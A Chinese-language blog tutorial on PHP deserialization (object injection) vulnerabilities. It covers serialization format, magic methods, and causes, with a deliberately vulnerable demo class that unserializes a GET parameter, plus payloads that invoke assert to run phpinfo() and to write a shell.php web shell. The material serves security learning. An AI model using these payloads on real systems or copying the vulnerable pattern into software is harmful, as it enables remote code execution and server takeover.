PHP反序列化
序列化说通俗点就是把一个对象变成可以传输的字符串。
序列化过程中还会对不同属性的变量进行不同方式的变化
public的属性在序列化时,直接显示属性名
protected的属性在序列化时,会在属性名前增加0x00*0x00,其长度会增加3
private的属性在序列化时,会在属性名前增加0x00classname0x00,其长度会增加类名长度+2
反序列化就是把被序列化的字符串还原为对象,然后在接下来的代码中继续使用。
PHP魔法函数
__construct() #类的构造函数 __destruct() #类的析构函数,在对象被销毁时执行该函数 __call() #在对象中调用一个不可访问方法时调用 __callStatic() #用静态方式中调用一个不可访问方法时调用 __get() #获得一个类的成员变量时调用 __set() #设置一个类的成员变量时调用 __isset() #当对不可访问属性调用isset()或empty()时调用 __unset() #当对不可访问属性调用unset()时被调用。 __sleep() #执行serialize()时,先会调用这个函数 __wakeup() #执行unserialize()时,先会调用这个函数 __toString() #类被当成字符串时的回应方法 __invoke() #调用函数的方式调用一个对象时的回应方法 __set_state() #调用var_export()导出类时,此静态方法会被调用。 __clone() #当对象复制完成时调用 __autoload() #尝试加载未定义的类 __debugInfo() #打印所需调试信息
序列化结构
PHP反序列化漏洞也叫PHP对象注入,是一个非常常见的漏洞,这种类型的漏洞虽然有些难以利用,但一旦利用成功就会造成非常危险的后果。漏洞的形成的根本原因是程序没有对用户输入的反序列化字符串进行检测,导致反序列化过程可以被恶意控制,进而造成代码执行、getshell等一系列不可控的后果。反序列化漏洞并不是PHP特有,也存在于Java、Python等语言之中,但其原理基本相通。
未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化过程,从而导致代码执行,SQL注入,目录遍历等不可控后果。
在反序列化的过程中自动触发了某些魔术方法。
unserialize函数的变量可控,php文件中存在可利用的类,类中有魔法函数
<?php class demo{ public $name; public $age; function __destruct(){ $a = $this->name; $a($this->age); } } $h = new demo(); echo serialize($h); unserialize($_GET['h']); ?>
payload
payload:(适用于destruct() wakeup()) O:4:"demo":2:{s:4:"name";s:6:"assert";s:3:"age";s:9:"phpinfo()";} 传木马 O:4:"demo":2:{s:4:"name";s:6:"assert";s:3:"age";s:64:"fputs(fopen('shell.php','w'),'<?php eval($_REQUEST["cmd"]);?>');";}
我们可以看到当,创建对象之后,没有调用该__destruct()函数,该函数也自动执行,也就是serialize()函数和unserialize()函数销毁了对象,触发了魔法函数的执行。
大致过程:
行云博客 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的;不得将上述内容用于商业或者非法用途,否则,一切后果请用户自负。 本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。 如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我(admin@xy586.top)联系处理。敬请谅解!
本文链接:https://www.xy586.top/38235.html
转载请注明文章来源:行云博客 » PHP反序列化漏洞原理及示例